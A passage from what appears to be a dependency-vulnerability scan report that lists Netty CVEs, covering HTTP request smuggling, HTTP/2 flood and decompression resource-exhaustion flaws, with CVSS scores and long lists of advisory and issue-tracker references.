- FEDORA-2020-66b5f85ccc - [bookkeeper-issues] 20200729 [GitHub] [bookkeeper] padma81 opened a new issue #2387: Security vulnerabilities in the apache/bookkeeper-4.9.2 image - [camel-commits] 20201120 [camel] branch camel-2.25.x updated: Updating Netty to 4.1.48.Final to fix some CVEs (e.g. CVE-2019-16869, CVE-2019-20444) - [cassandra-commits] 20200218 [jira] [Created] (CASSANDRA-15590) Upgrade io.netty_netty-all dependency to fix security vulnerabilities - [cassandra-commits] 20200604 [jira] [Created] (CASSANDRA-15856) Security vulnerabilities with dependency jars of Cassandra 3.11.6 - [druid-commits] 20200131 [GitHub] [druid] ccaominh commented on a change in pull request #9300: Fix / suppress netty CVEs CVE-2019-20445 and CVE-2019-20444 - [druid-commits] 20200131 [GitHub] [druid] gianm merged pull request #9300: Fix / suppress netty CVEs CVE-2019-20445 and CVE-2019-20444 - [druid-commits] 20200131 [GitHub] [druid] zachjsh opened a new pull request #9300: Fix / suppress netty CVEs CVE-2019-20445 and CVE-2019-20444 - [flink-dev] 20200910 [jira] [Created] (FLINK-19195) question on security vulnerabilities in flink - [flink-issues] 20200910 [jira] [Created] (FLINK-19195) question on security vulnerabilities in flink - [flink-issues] 20210426 [jira] [Commented] (FLINK-22441) In Flink v1.11.3 contains netty(version:3.10.6) netty(version:4.1.60) . There are many vulnerabilities, like CVE-2021-21409 etc. please confirm these version and fix. thx - [geode-dev] 20200408 Proposal to bring GEODE-7969 to support/1.12 - [geode-dev] 20200408 Re: Proposal to bring GEODE-7969 to support/1.12 - [hadoop-common-commits] 20200309 [hadoop] branch branch-3.1 updated: HADOOP-16871. Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444, CVE-2019-16869 - [hadoop-common-commits] 20200309 [hadoop] branch branch-3.2 updated: HADOOP-16871. Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444, CVE-2019-16869 - [hadoop-common-commits] 20200309 [hadoop] branch trunk updated: HADOOP-16871. Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444, CVE-2019-16869 - [hadoop-common-issues] 20200219 [jira] [Assigned] (HADOOP-16871) Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444,CVE-2019-16869 - [hadoop-common-issues] 20200219 [jira] [Updated] (HADOOP-16871) Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444, - [hadoop-common-issues] 20200219 [jira] [Updated] (HADOOP-16871) Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444,CVE-2019-16869 - [hadoop-common-issues] 20200224 [jira] [Commented] (HADOOP-16871) Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444,CVE-2019-16869 - [hadoop-common-issues] 20200225 [jira] [Commented] (HADOOP-16871) Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444,CVE-2019-16869 - [hadoop-common-issues] 20200309 [jira] [Commented] (HADOOP-16871) Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444,CVE-2019-16869 - [hadoop-common-issues] 20200309 [jira] [Updated] (HADOOP-16871) Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444,CVE-2019-16869 - [hadoop-common-issues] 20200310 [jira] [Commented] (HADOOP-16871) Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444,CVE-2019-16869 - [pulsar-commits] 20201215 [GitHub] [pulsar] yanshuchong opened a new issue #8967: CVSS issue list - [pulsar-commits] 20210120 [GitHub] [pulsar] fmiguelez opened a new issue #9249: Upgrade Netty dependency in broker to solve vulnerabilities: CVE-2019-16869, CVE-2020-11612, CVE-2019-20445, CVE-2019-20444 - [pulsar-commits] 20210121 [GitHub] [pulsar] hpvd commented on issue #9249: Upgrade Netty dependency in broker to solve vulnerabilities: CVE-2019-16869, CVE-2020-11612, CVE-2019-20445, CVE-2019-20444 - [pulsar-commits] 20210122 [GitHub] [pulsar] hpvd commented on issue #9249: Upgrade Netty dependency in broker to solve vulnerabilities: CVE-2019-16869, CVE-2020-11612, CVE-2019-20445, CVE-2019-20444 - [spark-issues] 20210824 [jira] [Created] (SPARK-36572) Upgrade version of io.netty to 4.1.44.Final to solve CVE-2019-20444 and CVE-2019-20445 - [zookeeper-dev] 20200203 [jira] [Created] (ZOOKEEPER-3716) upgrade netty 4.1.42 to address CVE-2019-20444 CVE-2019-20445 - [zookeeper-dev] 20200204 Build failed in Jenkins: zookeeper-branch36-java11 #39 - [zookeeper-dev] 20200204 Build failed in Jenkins: zookeeper-branch36-java8 #38 - [zookeeper-dev] 20200204 Build failed in Jenkins: zookeeper-master-maven-jdk11 #361 - [zookeeper-issues] 20200203 [jira] [Assigned] (ZOOKEEPER-3716) upgrade netty 4.1.42 to address CVE-2019-20444 CVE-2019-20445 - [zookeeper-issues] 20200203 [jira] [Commented] (ZOOKEEPER-3716) upgrade netty 4.1.42 to address CVE-2019-20444 CVE-2019-20445 - [zookeeper-issues] 20200203 [jira] [Created] (ZOOKEEPER-3716) upgrade netty 4.1.42 to address CVE-2019-20444 CVE-2019-20445 - [zookeeper-issues] 20200203 [jira] [Updated] (ZOOKEEPER-3716) upgrade netty 4.1.42 to address CVE-2019-20444 CVE-2019-20445 - [zookeeper-issues] 20200204 [jira] [Resolved] (ZOOKEEPER-3716) upgrade netty 4.1.42 to address CVE-2019-20444 CVE-2019-20445 - [zookeeper-issues] 20200209 [jira] [Commented] (ZOOKEEPER-3716) upgrade netty 4.1.42 to address CVE-2019-20444 CVE-2019-20445 - [zookeeper-issues] 20200209 [jira] [Updated] (ZOOKEEPER-3716) upgrade netty 4.1.42 to address CVE-2019-20444 CVE-2019-20445 - https://lists.apache.org/thread.html/r0f5e72d5f69b4720dfe64fcbc2da9afae949ed1e9cbffa84bb7d92d7%40%3Cnotifications.zookeeper.apache.org%3E - https://lists.apache.org/thread.html/r310d2ce22304d5298ff87f10134f918c87919b452734f9841d95682d%40%3Ccommits.zookeeper.apache.org%3E - https://lists.apache.org/thread.html/r4c675b2d0cc2a5e506b11ee10d60a378859ee340aca052e4c7ef4749%40%3Cnotifications.zookeeper.apache.org%3E - https://lists.apache.org/thread.html/r819aaeb9944bdcfca438dcc51f05650dc728daf64dfd7d774fc2499b%40%3Ccommits.zookeeper.apache.org%3E - https://lists.apache.org/thread.html/r91e0fa345c86c128b75a4a791b4b503b53173ff4c13049ac7129d319%40%3Cnotifications.zookeeper.apache.org%3E - https://lists.apache.org/thread.html/r9b20cdac704cf9a583400350e2d5b576fa8417c18ddb961201676c60%40%3Ccommits.zookeeper.apache.org%3E - https://lists.apache.org/thread.html/rb84c57670ec48ef23f4d07973b7fa69f629b8e7fcfb48874362feb6f%40%3Ccommits.zookeeper.apache.org%3E - https://lists.apache.org/thread.html/rce71d33747010d32d31d90f5d737dae26291d96552f513a266c92fbb%40%3Cnotifications.zookeeper.apache.org%3E - https://lists.apache.org/thread.html/rfb55f245b08d8a6ec0fb4dc159022227cd22de34c4419c2fbb18802b%40%3Cnotifications.zookeeper.apache.org%3E DEBIAN - DSA-4885 MISC - https://github.com/netty/netty/compare/netty-4.1.43.Final...netty-4.1.44.Final MISC - https://github.com/netty/netty/issues/9866 MLIST - [debian-lts-announce] 20200219 [SECURITY] [DLA 2109-1] netty security update MLIST - [debian-lts-announce] 20200219 [SECURITY] [DLA 2110-1] netty-3.9 security update MLIST - [debian-lts-announce] 20200904 [SECURITY] [DLA 2364-1] netty security update MLIST - [debian-lts-announce] 20200904 [SECURITY] [DLA 2365-1] netty-3.9 security update OSSINDEX - [CVE-2019-20444] CWE-444: Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling') OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-20444 OSSIndex - https://github.com/netty/netty/issues/9866 REDHAT - RHSA-2020:0497 REDHAT - RHSA-2020:0567 REDHAT - RHSA-2020:0601 REDHAT - RHSA-2020:0605 REDHAT - RHSA-2020:0606 REDHAT - RHSA-2020:0804 REDHAT - RHSA-2020:0805 REDHAT - RHSA-2020:0806 REDHAT - RHSA-2020:0811 UBUNTU - USN-4532-1 Vulnerable Software & Versions: (show all )
CVE-2019-20445 suppress
HttpObjectDecoder.java in Netty before 4.1.44 allows a Content-Length header to be accompanied by a second Content-Length header, or by a Transfer-Encoding header. CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling')
CVSSv2:
Base Score: MEDIUM (6.4) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:N CVSSv3:
Base Score: CRITICAL (9.1) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N References:
- FEDORA-2020-66b5f85ccc - [bookkeeper-issues] 20200729 [GitHub] [bookkeeper] padma81 opened a new issue #2387: Security vulnerabilities in the apache/bookkeeper-4.9.2 image - [cassandra-commits] 20200218 [jira] [Created] (CASSANDRA-15590) Upgrade io.netty_netty-all dependency to fix security vulnerabilities - [cassandra-commits] 20200604 [jira] [Created] (CASSANDRA-15856) Security vulnerabilities with dependency jars of Cassandra 3.11.6 - [druid-commits] 20200131 [GitHub] [druid] ccaominh commented on a change in pull request #9300: Fix / suppress netty CVEs CVE-2019-20445 and CVE-2019-20444 - [druid-commits] 20200131 [GitHub] [druid] gianm merged pull request #9300: Fix / suppress netty CVEs CVE-2019-20445 and CVE-2019-20444 - [druid-commits] 20200131 [GitHub] [druid] zachjsh opened a new pull request #9300: Fix / suppress netty CVEs CVE-2019-20445 and CVE-2019-20444 - [flink-dev] 20200910 [jira] [Created] (FLINK-19195) question on security vulnerabilities in flink - [flink-issues] 20200910 [jira] [Created] (FLINK-19195) question on security vulnerabilities in flink - [flink-issues] 20210426 [jira] [Commented] (FLINK-22441) In Flink v1.11.3 contains netty(version:3.10.6) netty(version:4.1.60) . There are many vulnerabilities, like CVE-2021-21409 etc. please confirm these version and fix. thx - [flume-issues] 20200410 [jira] [Created] (FLUME-3363) CVE-2019-20445 - [flume-issues] 20200415 [jira] [Updated] (FLUME-3363) CVE-2019-20445 - [flume-issues] 20200422 [jira] [Commented] (FLUME-3363) CVE-2019-20445 - [geode-dev] 20200408 Proposal to bring GEODE-7969 to support/1.12 - [geode-dev] 20200408 Re: Proposal to bring GEODE-7969 to support/1.12 - [pulsar-commits] 20201215 [GitHub] [pulsar] yanshuchong opened a new issue #8967: CVSS issue list - [pulsar-commits] 20210120 [GitHub] [pulsar] fmiguelez opened a new issue #9249: Upgrade Netty dependency in broker to solve vulnerabilities: CVE-2019-16869, CVE-2020-11612, CVE-2019-20445, CVE-2019-20444 - [pulsar-commits] 20210121 [GitHub] [pulsar] hpvd commented on issue #9249: Upgrade Netty dependency in broker to solve vulnerabilities: CVE-2019-16869, CVE-2020-11612, CVE-2019-20445, CVE-2019-20444 - [pulsar-commits] 20210122 [GitHub] [pulsar] hpvd commented on issue #9249: Upgrade Netty dependency in broker to solve vulnerabilities: CVE-2019-16869, CVE-2020-11612, CVE-2019-20445, CVE-2019-20444 - [spark-issues] 20200309 [jira] [Created] (SPARK-31095) Upgrade netty version to fix security vulnerabilities - [spark-issues] 20210824 [jira] [Created] (SPARK-36572) Upgrade version of io.netty to 4.1.44.Final to solve CVE-2019-20444 and CVE-2019-20445 - [spark-reviews] 20200310 [GitHub] [spark] dongjoon-hyun commented on issue #27870: [SPARK-31095][BUILD][2.4] Upgrade netty-all to 4.1.47.Final - [zookeeper-dev] 20200203 Re: [VOTE] Apache ZooKeeper release 3.6.0 candidate 1 - [zookeeper-dev] 20200203 [jira] [Created] (ZOOKEEPER-3716) upgrade netty 4.1.42 to address CVE-2019-20444 CVE-2019-20445 - [zookeeper-issues] 20200203 [jira] [Assigned] (ZOOKEEPER-3716) upgrade netty 4.1.42 to address CVE-2019-20444 CVE-2019-20445 - [zookeeper-issues] 20200203 [jira] [Commented] (ZOOKEEPER-3716) upgrade netty 4.1.42 to address CVE-2019-20444 CVE-2019-20445 - [zookeeper-issues] 20200203 [jira] [Created] (ZOOKEEPER-3716) upgrade netty 4.1.42 to address CVE-2019-20444 CVE-2019-20445 - [zookeeper-issues] 20200203 [jira] [Updated] (ZOOKEEPER-3716) upgrade netty 4.1.42 to address CVE-2019-20444 CVE-2019-20445 - [zookeeper-issues] 20200204 [jira] [Resolved] (ZOOKEEPER-3716) upgrade netty 4.1.42 to address CVE-2019-20444 CVE-2019-20445 - [zookeeper-issues] 20200209 [jira] [Commented] (ZOOKEEPER-3716) upgrade netty 4.1.42 to address CVE-2019-20444 CVE-2019-20445 - [zookeeper-issues] 20200209 [jira] [Updated] (ZOOKEEPER-3716) upgrade netty 4.1.42 to address CVE-2019-20444 CVE-2019-20445 - https://lists.apache.org/thread.html/r310d2ce22304d5298ff87f10134f918c87919b452734f9841d95682d%40%3Ccommits.zookeeper.apache.org%3E - https://lists.apache.org/thread.html/r819aaeb9944bdcfca438dcc51f05650dc728daf64dfd7d774fc2499b%40%3Ccommits.zookeeper.apache.org%3E - https://lists.apache.org/thread.html/r9b20cdac704cf9a583400350e2d5b576fa8417c18ddb961201676c60%40%3Ccommits.zookeeper.apache.org%3E - https://lists.apache.org/thread.html/rb84c57670ec48ef23f4d07973b7fa69f629b8e7fcfb48874362feb6f%40%3Ccommits.zookeeper.apache.org%3E - https://lists.apache.org/thread.html/rce71d33747010d32d31d90f5d737dae26291d96552f513a266c92fbb%40%3Cnotifications.zookeeper.apache.org%3E - https://lists.apache.org/thread.html/rfb55f245b08d8a6ec0fb4dc159022227cd22de34c4419c2fbb18802b%40%3Cnotifications.zookeeper.apache.org%3E DEBIAN - DSA-4885 MISC - https://github.com/netty/netty/compare/netty-4.1.43.Final...netty-4.1.44.Final MISC - https://github.com/netty/netty/issues/9861 MLIST - [debian-lts-announce] 20200219 [SECURITY] [DLA 2109-1] netty security update MLIST - [debian-lts-announce] 20200219 [SECURITY] [DLA 2110-1] netty-3.9 security update MLIST - [debian-lts-announce] 20200904 [SECURITY] [DLA 2364-1] netty security update MLIST - [debian-lts-announce] 20200904 [SECURITY] [DLA 2365-1] netty-3.9 security update OSSINDEX - [CVE-2019-20445] CWE-444: Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling') OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-20445 OSSIndex - https://github.com/netty/netty/issues/9861 OSSIndex - https://github.com/netty/netty/pull/9865 OSSIndex - https://lists.apache.org/thread.html/r70b1ff22ee80e8101805b9a473116dd33265709007d2deb6f8c80bf2@%3Ccommits.druid.apache.org%3E REDHAT - RHSA-2020:0497 REDHAT - RHSA-2020:0567 REDHAT - RHSA-2020:0601 REDHAT - RHSA-2020:0605 REDHAT - RHSA-2020:0606 REDHAT - RHSA-2020:0804 REDHAT - RHSA-2020:0805 REDHAT - RHSA-2020:0806 REDHAT - RHSA-2020:0811 UBUNTU - USN-4532-1 Vulnerable Software & Versions: (show all )
CVE-2019-16869 suppress
Netty before 4.1.42.Final mishandles whitespace before the colon in HTTP headers (such as a "Transfer-Encoding : chunked" line), which leads to HTTP request smuggling. CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling')
CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:P/A:N CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N References:
- [camel-commits] 20201120 [camel] branch camel-2.25.x updated: Updating Netty to 4.1.48.Final to fix some CVEs (e.g. CVE-2019-16869, CVE-2019-20444) - [cassandra-commits] 20191113 [jira] [Created] (CASSANDRA-15417) CVE-2019-16869(Netty is vulnerable to HTTP Request Smuggling) of severity 7.5 - [cassandra-commits] 20191113 [jira] [Created] (CASSANDRA-15418) CVE-2019-16869(Netty is vulnerable to HTTP Request Smuggling) of severity 7.5 for Cassendra 2.2.5 - [cassandra-commits] 20200218 [jira] [Created] (CASSANDRA-15590) Upgrade io.netty_netty-all dependency to fix security vulnerabilities - [cassandra-commits] 20200604 [jira] [Created] (CASSANDRA-15856) Security vulnerabilities with dependency jars of Cassandra 3.11.6 - [cassandra-commits] 20210526 [jira] [Created] (CASSANDRA-16699) Security vulnerability CVE-2020-7238 for Netty - [cassandra-commits] 20210526 [jira] [Updated] (CASSANDRA-16699) Security vulnerability CVE-2020-7238 for Netty - [cassandra-commits] 20210924 [jira] [Commented] (CASSANDRA-15417) CVE-2019-16869(Netty is vulnerable to HTTP Request Smuggling) of severity 7.5 - [cassandra-commits] 20210924 [jira] [Updated] (CASSANDRA-15417) CVE-2019-16869(Netty is vulnerable to HTTP Request Smuggling) of severity 7.5 - [drill-dev] 20191017 Dependencies used by Drill contain known vulnerabilities - [drill-dev] 20191021 [jira] [Created] (DRILL-7416) Updates required to dependencies to resolve potential security vulnerabilities - [drill-issues] 20191021 [jira] [Created] (DRILL-7416) Updates required to dependencies to resolve potential security vulnerabilities - [druid-commits] 20191115 [GitHub] [incubator-druid] ccaominh opened a new pull request #8878: Address security vulnerabilities - [druid-commits] 20200131 [GitHub] [druid] ccaominh commented on a change in pull request #9300: Fix / suppress netty CVEs CVE-2019-20445 and CVE-2019-20444 - [flink-dev] 20200910 [jira] [Created] (FLINK-19195) question on security vulnerabilities in flink - [flink-issues] 20200910 [jira] [Created] (FLINK-19195) question on security vulnerabilities in flink - [hadoop-common-commits] 20200309 [hadoop] branch branch-3.1 updated: HADOOP-16871. Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444, CVE-2019-16869 - [hadoop-common-commits] 20200309 [hadoop] branch branch-3.2 updated: HADOOP-16871. Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444, CVE-2019-16869 - [hadoop-common-commits] 20200309 [hadoop] branch trunk updated: HADOOP-16871. Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444, CVE-2019-16869 - [hadoop-common-issues] 20200219 [jira] [Assigned] (HADOOP-16871) Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444,CVE-2019-16869 - [hadoop-common-issues] 20200219 [jira] [Updated] (HADOOP-16871) Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444, - [hadoop-common-issues] 20200219 [jira] [Updated] (HADOOP-16871) Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444,CVE-2019-16869 - [hadoop-common-issues] 20200224 [jira] [Commented] (HADOOP-16871) Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444,CVE-2019-16869 - [hadoop-common-issues] 20200225 [jira] [Commented] (HADOOP-16871) Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444,CVE-2019-16869 - [hadoop-common-issues] 20200309 [jira] [Commented] (HADOOP-16871) Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444,CVE-2019-16869 - [hadoop-common-issues] 20200309 [jira] [Updated] (HADOOP-16871) Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444,CVE-2019-16869 - [hadoop-common-issues] 20200310 [jira] [Commented] (HADOOP-16871) Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444,CVE-2019-16869 - [olingo-dev] 20191206 [jira] [Assigned] (OLINGO-1414) Dependency check fails on 4.7.0 : CVE-2019-16869 on Netty - [olingo-dev] 20191206 [jira] [Commented] (OLINGO-1414) Dependency check fails on 4.7.0 : CVE-2019-16869 on Netty - [olingo-dev] 20191206 [jira] [Created] (OLINGO-1414) Dependency check fails on 4.7.0 : CVE-2019-16869 on Netty - [olingo-dev] 20191206 [jira] [Resolved] (OLINGO-1414) Dependency check fails on 4.7.0 : CVE-2019-16869 on Netty - [olingo-dev] 20191206 [jira] [Updated] (OLINGO-1414) Dependency check fails on 4.7.0 : CVE-2019-16869 on Netty - [olingo-dev] 20191209 [jira] [Commented] (OLINGO-1414) Dependency check fails on 4.7.0 : CVE-2019-16869 on Netty - [olingo-dev] 20191227 [jira] [Commented] (OLINGO-1414) Dependency check fails on 4.7.0 : CVE-2019-16869 on Netty - [pulsar-commits] 20201215 [GitHub] [pulsar] yanshuchong opened a new issue #8967: CVSS issue list - [pulsar-commits] 20210120 [GitHub] [pulsar] fmiguelez opened a new issue #9249: Upgrade Netty dependency in broker to solve vulnerabilities: CVE-2019-16869, CVE-2020-11612, CVE-2019-20445, CVE-2019-20444 - [pulsar-commits] 20210121 [GitHub] [pulsar] hpvd commented on issue #9249: Upgrade Netty dependency in broker to solve vulnerabilities: CVE-2019-16869, CVE-2020-11612, CVE-2019-20445, CVE-2019-20444 - [pulsar-commits] 20210122 [GitHub] [pulsar] hpvd commented on issue #9249: Upgrade Netty dependency in broker to solve vulnerabilities: CVE-2019-16869, CVE-2020-11612, CVE-2019-20445, CVE-2019-20444 - [rocketmq-dev] 20201224 [GitHub] [rocketmq] codecov-io commented on pull request #2517: fix CVE-2019-16869, CVE-2018-8020 - [rocketmq-dev] 20201224 [GitHub] [rocketmq] coveralls commented on pull request #2517: fix CVE-2019-16869, CVE-2018-8020 - [rocketmq-dev] 20201224 [GitHub] [rocketmq] crazywen opened a new pull request #2517: fix CVE-2019-16869, CVE-2018-8020 - [spark-issues] 20191219 [jira] [Commented] (SPARK-30308) Update Netty and Netty-all to address CVE-2019-16869 - [spark-issues] 20191219 [jira] [Created] (SPARK-30308) Update Netty and Netty-all to address CVE-2019-16869 - [spark-issues] 20191219 [jira] [Updated] (SPARK-30308) Update Netty and Netty-all to address CVE-2019-16869 - [spark-issues] 20191220 [jira] [Comment Edited] (SPARK-30308) Update Netty and Netty-all to address CVE-2019-16869 - [spark-issues] 20191220 [jira] [Commented] (SPARK-30308) Update Netty and Netty-all to address CVE-2019-16869 - [spark-issues] 20191220 [jira] [Issue Comment Deleted] (SPARK-30308) Update Netty and Netty-all to address CVE-2019-16869 - [spark-issues] 20191220 [jira] [Reopened] (SPARK-30308) Update Netty and Netty-all to address CVE-2019-16869 - [spark-issues] 20191220 [jira] [Resolved] (SPARK-30308) Update Netty and Netty-all to address CVE-2019-16869 - [tinkerpop-commits] 20191022 [tinkerpop] branch tp34 updated: Bump to Netty 4.1.42 fixes CVE-2019-16869 - CTR - [zookeeper-commits] 20191003 [zookeeper] branch branch-3.5 updated: ZOOKEEPER-3563: Update Netty to fix CVE-2019-16869 - [zookeeper-commits] 20191003 [zookeeper] branch branch-3.5.6 updated: ZOOKEEPER-3563: Update Netty to fix CVE-2019-16869 - [zookeeper-commits] 20191003 [zookeeper] branch master updated: ZOOKEEPER-3563: Update Netty to address CVE-2019-16869 - [zookeeper-dev] 20190930 Re: [VOTE] Apache ZooKeeper release 3.5.6 candidate 2 - [zookeeper-dev] 20190930 [jira] [Created] (ZOOKEEPER-3563) dependency check failing on 3.4 and 3.5 branches - netty-3.10.6.Final.jar: CVE-2019-16869 - [zookeeper-dev] 20191001 Re: [VOTE] Apache ZooKeeper release 3.5.6 candidate 2 - [zookeeper-dev] 20191002 Re: [VOTE] Apache ZooKeeper release 3.5.6 candidate 2 - [zookeeper-issues] 20190930 [jira] [Commented] (ZOOKEEPER-3563) dependency check failing on 3.4 and 3.5 branches - CVE-2019-16869 on Netty - [zookeeper-issues] 20190930 [jira] [Created] (ZOOKEEPER-3563) dependency check failing on 3.4 and 3.5 branches - netty-3.10.6.Final.jar: CVE-2019-16869 - [zookeeper-issues] 20190930 [jira] [Updated] (ZOOKEEPER-3563) dependency check failing on 3.4 and 3.5 branches - CVE-2019-16869 on Netty - [zookeeper-issues] 20190930 [jira] [Updated] (ZOOKEEPER-3563) dependency check failing on 3.4 and 3.5 branches - netty with CVE-2019-16869 - [zookeeper-issues] 20191001 [jira] [Commented] (ZOOKEEPER-3563) dependency check failing on 3.4 and 3.5 branches - CVE-2019-16869 on Netty - [zookeeper-issues] 20191003 [jira] [Commented] (ZOOKEEPER-3563) dependency check failing on 3.4 and 3.5 branches - CVE-2019-16869 on Netty - [zookeeper-issues] 20191008 [jira] [Commented] (ZOOKEEPER-3563) dependency check failing on 3.4 and 3.5 branches - CVE-2019-16869 on Netty - [zookeeper-issues] 20191008 [jira] [Resolved] (ZOOKEEPER-3563) dependency check failing on 3.4 and 3.5 branches - CVE-2019-16869 on Netty BUGTRAQ - 20200105 [SECURITY] [DSA 4597-1] netty security update DEBIAN - DSA-4597 MISC - https://github.com/netty/netty/compare/netty-4.1.41.Final...netty-4.1.42.Final MISC - https://github.com/netty/netty/issues/9571 MLIST - [debian-lts-announce] 20190930 [SECURITY] [DLA 1941-1] netty security update MLIST - [debian-lts-announce] 20200219 [SECURITY] [DLA 2110-1] netty-3.9 security update MLIST - [debian-lts-announce] 20200904 [SECURITY] [DLA 2365-1] netty-3.9 security update OSSINDEX - [CVE-2019-16869] CWE-444: Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling') OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-16869 OSSIndex - https://github.com/netty/netty/issues/9571 REDHAT - RHSA-2019:3892 REDHAT - RHSA-2019:3901 REDHAT - RHSA-2020:0159 REDHAT - RHSA-2020:0160 REDHAT - RHSA-2020:0161 REDHAT - RHSA-2020:0164 REDHAT - RHSA-2020:0445 UBUNTU - USN-4532-1 Vulnerable Software & Versions: (show all )
CVE-2019-9512 (OSSINDEX) suppress
Some HTTP/2 implementations are vulnerable to ping floods, potentially leading to a denial of service. The attacker sends continual pings to an HTTP/2 peer, causing the peer to build an internal queue of responses. Depending on how efficiently this data is queued, this can consume excess CPU, memory, or both. CWE-400 Uncontrolled Resource Consumption ('Resource Exhaustion')
CVSSv2:
Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:/C:N/I:N/A:H References:
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:io.netty:netty-codec-http2:4.1.38.Final:*:*:*:*:*:*:* CVE-2019-9514 (OSSINDEX) suppress
Some HTTP/2 implementations are vulnerable to a reset flood, potentially leading to a denial of service. The attacker opens a number of streams and sends an invalid request over each stream that should solicit a stream of RST_STREAM frames from the peer. Depending on how the peer queues the RST_STREAM frames, this can consume excess memory, CPU, or both. CWE-400 Uncontrolled Resource Consumption ('Resource Exhaustion')
CVSSv2:
Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:/C:N/I:N/A:H References:
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:io.netty:netty-codec-http2:4.1.38.Final:*:*:*:*:*:*:* CVE-2019-9515 (OSSINDEX) suppress
Some HTTP/2 implementations are vulnerable to a settings flood, potentially leading to a denial of service. The attacker sends a stream of SETTINGS frames to the peer. Since the RFC requires that the peer reply with one acknowledgement per SETTINGS frame, an empty SETTINGS frame is almost equivalent in behavior to a ping. Depending on how efficiently this data is queued, this can consume excess CPU, memory, or both. CWE-400 Uncontrolled Resource Consumption ('Resource Exhaustion')
CVSSv2:
Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:/C:N/I:N/A:H References:
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:io.netty:netty-codec-http2:4.1.38.Final:*:*:*:*:*:*:* CVE-2019-9518 (OSSINDEX) suppress
Some HTTP/2 implementations are vulnerable to a flood of empty frames, potentially leading to a denial of service. The attacker sends a stream of frames with an empty payload and without the end-of-stream flag. These frames can be DATA, HEADERS, CONTINUATION and/or PUSH_PROMISE. The peer spends time processing each frame disproportionate to attack bandwidth. This can consume excess CPU. CWE-400 Uncontrolled Resource Consumption ('Resource Exhaustion')
CVSSv2:
Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:/C:N/I:N/A:H References:
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:io.netty:netty-codec-http2:4.1.38.Final:*:*:*:*:*:*:* CVE-2020-11612 suppress
The ZlibDecoders in Netty 4.1.x before 4.1.46 allow for unbounded memory allocation while decoding a ZlibEncoded byte stream. An attacker could send a large ZlibEncoded byte stream to the Netty server, forcing the server to allocate all of its free memory to a single decoder. CWE-770 Allocation of Resources Without Limits or Throttling
CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions: (show all )
CVE-2021-37136 suppress
The Bzip2 decompression decoder function doesn't allow setting size restrictions on the decompressed output data (which affects the allocation size used during decompression). All users of Bzip2Decoder are affected. The malicious input can trigger an OOME and so a DoS attack CWE-400 Uncontrolled Resource Consumption ('Resource Exhaustion')
CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions: (show all )
CVE-2021-37137 suppress
The Snappy frame decoder function doesn't restrict the chunk length which may lead to excessive memory usage. Beside this it also may buffer reserved skippable chunks until the whole chunk was received which may lead to excessive memory usage as well. This vulnerability can be triggered by supplying malicious input that decompresses to a very big size (via a network stream or a file) or by sending a huge skippable chunk. CWE-400 Uncontrolled Resource Consumption ('Resource Exhaustion')
CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions: (show all )
CVE-2022-41881 suppress
Netty project is an event-driven asynchronous network application framework. In versions prior to 4.1.86.Final, a StackOverflowError can be raised when parsing a malformed crafted message due to an infinite recursion. This issue is patched in version 4.1.86.Final. There is no workaround, except using a custom HaProxyMessageDecoder. CWE-674 Uncontrolled Recursion
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions:
